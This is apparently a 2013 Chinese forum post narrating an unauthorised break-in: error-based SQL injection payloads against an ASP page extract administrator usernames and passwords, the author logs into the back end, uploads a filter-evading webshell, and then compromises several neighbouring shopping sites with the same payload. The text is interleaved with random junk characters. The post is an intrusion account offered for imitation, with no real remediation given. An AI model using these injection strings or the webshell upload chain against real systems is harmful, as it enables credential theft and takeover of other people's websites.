发现一个注入点
. y8 F. s4 Q6 e4 _/ ]9 X, a' zhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
! O I( B% t) z' U0 C9 n% |: x$ D
习惯性的加’having1=1--
$ q9 B5 ]4 B9 i# P5 R& P
. b/ O& e; N* Z* Phttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
+ b7 L# j, d( X9 n' G
7 o; \8 u( X. a0 I* \+ W3 i0# u# b3 @7 N, f% W
% j# L. H% a2 x# n" }. p
爆出Diary_A.dl_Title(这时候很激动啊)+ ?$ K8 u* h& ^& @, _6 z
! `4 |+ T8 Q# s- ~ m8 R T: f9 ?: E那么继续
6 F) I- H# a% A- d9 o3 c% Fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—( v4 p$ [0 A. m3 S5 F2 A& o
& O) H: `4 l a1 ]) }7 A) W继续,一直爆下去# ^0 B( U. p0 q
8 ^- S, D7 {0 x' }
爆到几个字段和表段 但是没找到需要的管理用户的字段3 H5 P M# V6 S7 P. v
% @ u8 m# T' c
蛋疼了 怎么办 然后去后台登陆页看源码
5 [3 Z$ h7 ~8 f% j5 t$ f' r- e
- R6 z& n; S- {( f8 V6 \; X0" J8 ^$ _/ Y4 z/ {( k+ q! E- ^
6 @1 K* I: t; i6 \ j8 b* NInput name= “ADUID”& I M. t* Y# m! [
Input name= “ADPWD”
( t: M" O6 e: Y: P* x6 l* P8 `0 o5 a
很幸运 找到了字段那就继续5 m" y$ t7 z! e- _0 Q+ |
找到之后开始爆用户
% e8 X" r$ d% V" x D9 r+ fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
8 Y8 Q N2 D3 P6 H( n爆密码0 J1 }- d$ w7 W- a
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—4 A; q; r% w! N1 Q( p0 a
测试了下 这个注入点只能爆到文章哪里的表
. E1 V4 u7 L P4 |
* b l5 }6 _/ n' c, m$ { D: a头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
. J( B/ J+ @* o. i: H+ l. H/ u/ k7 O- F
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了( p& T9 d6 \5 l7 X
- b* p, S/ T U: Q473! p8 ]0 r7 t* q) m
. \2 f- q, F! _2 V1 p
进后台' B$ ^3 i1 Z& }, \0 i& D- t
/ ]+ l4 F3 X, T5 Q( Q1 D0 ?8 s# t# C" D
发现几个上传点 有的地方不能上传 而且防止恶意代码
( K4 [0 |5 z+ `: X! s) |" D/ v+ O
9 T+ V& I1 A6 q7 o3 y* r- U9 C I+ O没办法 各种百度各种找大牛 找到一只好像可以突破的马6 \) B# A- N; A) @
2 E5 \8 c8 P/ s& d" N
4 O- M/ S# Y, L3 t3 |2 b在系统管理那里直接上传 不过没有显示地址- z/ C! s" B3 @" g
0 U! U; y6 T, {
再上传一次 抓包 搞定OK
7 N9 n/ Z0 h4 L! `/ |9 z+ V6 x6 V; Y; G7 R! p: X7 J% B
% E' Q4 v5 ^; L0 ~8 R: N7 G
: g2 M& K7 f$ i @472
' m$ r4 Y$ i7 o. K5 C
% Q% c# o- p7 r% W5 f* S晚上不行了 去睡觉。。。
6 J. e% s8 n% Y0 g; O第二天刚起床 闲的没事做继续日站吧
3 {; @! U! D. u/ l& z* L" _% t& s$ `: V0 _9 a2 S( Z
找个站 就把这个站的旁c扫了下8 V8 z8 x5 L3 u. d& J. t
5 n2 F& \# g6 L) c( h% f" x发现c段也有一个购物站 ,然后还和这个站的模板差不多
5 f8 C& v" _$ j" F/ s% l
, a6 ^0 @: `, ~1 h2 J0 Z就找到会员登录口测试1 y# f7 _6 t* S* ~& D( b2 m2 a; p
) C) F3 M# N1 F, V* C6 ?8 D
'and (select top 1 MGR_UID from A_MGR)>0—
B* e4 x" i4 G; X+ R* z1 I0 X果断爆到了 这时候我很激动 通杀' u8 v; ]0 `% j' x0 ~4 [
h& K& T7 K9 @$ b4 `再次翻c段
# V# r6 Z; Y7 v; ?- ]7 P; R' R$ J9 p
翻出几个站 都成功拿下
/ ^! b# }% R0 f4 g
1 b6 S& \! |* N: ]+ q& F5 A# L9 A2 R0 f
% f- u/ |' @- E; `0 x
修复方案:- W/ S4 g. s( i# A& k g- S
他们比我专业 & O$ h9 N& Z3 j0 ~ ]5 o" B
+ }+ [; Y4 ?0 v5 u+ A
& ?" \; [9 i5 |# d
2 ~6 _( a; j: g* e6 w1 Y |
发表于 2013-4-4 17:40:38
收藏
支持
反对